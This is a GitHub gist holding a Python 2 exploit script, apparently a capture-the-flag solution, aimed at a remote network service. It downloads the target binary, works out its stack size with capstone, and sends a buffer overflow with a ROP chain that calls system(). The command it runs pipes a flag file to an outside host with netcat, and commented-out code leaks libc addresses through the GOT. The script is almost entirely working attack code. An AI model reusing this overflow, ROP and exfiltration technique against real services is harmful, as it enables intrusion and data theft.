Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import socket
import re
from capstone import *
from Pwn import *
import sys
# p = Pwn(mode=1,host='52.20.10.244',port=12351)
def disas(code):
asm = ''
md = Cs(CS_ARCH_X86, CS_MODE_64)
for i in md.disasm(code, 0x1000):
asm += i.op_str
return asm
def getPortSize():
p3 = Pwn(host='52.20.10.244',port=8888)
p3.connect()
bytes = ''
d = p3.recv(1024)
while 1:
if len(d) > 0:
bytes += d
else:
break
d = p3.recv(1024)
port = p3.unpack(bytes[0x7d5:0x7d5 + 4])
size = p3.unpack(bytes[0x82f:0x82f + 4])
asm = disas(bytes[0x824:0x824+7])
# print asm
_match = re.match(r'rcx, qword ptr \[rbp - ([0-9a-fx]*)\]',asm)
stack_size = int(_match.group(1),16)
p3.close()
return port,size,stack_size,bytes
def getshell(p2,stack_size,system_addr,addr):
payload = 'cat flag | nc 128.199.171.28 8001;'
payload+= 'A'*(stack_size - 8 - len(payload)) + p2.p32(0x6) + 'AAAA' + 'C'*8
rop = [
0x4008d3, # pop rdi ; ret
addr,
system_addr
]
# rop = [
# 0x4008d3, # pop rdi ; ret
# 0x6,
# 0x04008d1, # pop rsi ; pop r15 ; ret
# addr,
# 0x41414141,
# 0x4005e0, # write
# 0x40077D, # main
# ]
payload += p2.pA(rop)
p2.send(payload)
# leak = p2.recv(1024)
# print leak
# leak = p2.recv(1024)
# print repr(leak)
p2.io()
def leak(p1,stack_size):
payload = 'A'*(stack_size - 8) + p1.p32(0x6) + 'AAAA' + 'C'*8
rop = [
0x4008d3, # pop rdi ; ret
0x6,
0x04008d1, # pop rsi ; pop r15 ; ret
p1.got('listen'),
0x41414141,
0x4005e0, # write
0x40077D, # main
]
payload += p1.pA(rop)
# f = open('bin.pl','w')
# f.write(payload)
# f.close()
p1.send(payload)
leak = p1.recv(1024)
leak = p1.recv(1024)
print repr(leak)
listen_addr = 0
# if leak != '':
# listen_addr = p1.unpack(leak[:8])
return listen_addr
def exploit():
system_addr = 0x7ffff7a5b640
start = 0x7fffffffebc0 + 16
# isFound = True
# it_time = False
while 1:
try:
_port,size,stack_size,bytes = getPortSize()
print '[+] Bot at :',_port
print '[+] Recv size:',size
print '[+] Stack size:',stack_size
# if isFound: # get shell time
if (stack_size + 24) > size:
print 'Can\'t overflow'
continue
else:
# print '[!!!!]',hex(start)
p2 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
p2.connect()
getshell(p2,stack_size,system_addr,start)
# break
# if (stack_size + 56) > size:
# print 'Can\'t overflow'
# continue
# # f = open('./bin.elf','w')
# # f.write(bytes)
# # f.close()
# p1 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
# p1.connect()
# # p2 = Pwn(mode=1,host='52.20.10.244',port=42462,pfile='./bin.elf')
# listen_addr = leak(p1,stack_size)
# if listen_addr != 0:
# system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
# # # bin_sh_addr = system_addr + 0x13669b
# print '[+] listen()',hex(listen_addr)
# print '[+] system()',hex(system_addr)
# # print '[+] "/bin/sh":',hex(bin_sh_addr)
# isFound = True
except AttributeError:
print 'Suck ___^____^___'
except socket.error:
print 'Fuck.........'
# system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
# print '[+] listen()',hex(listen_addr)
# print '[+] system()',hex(system_addr)
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.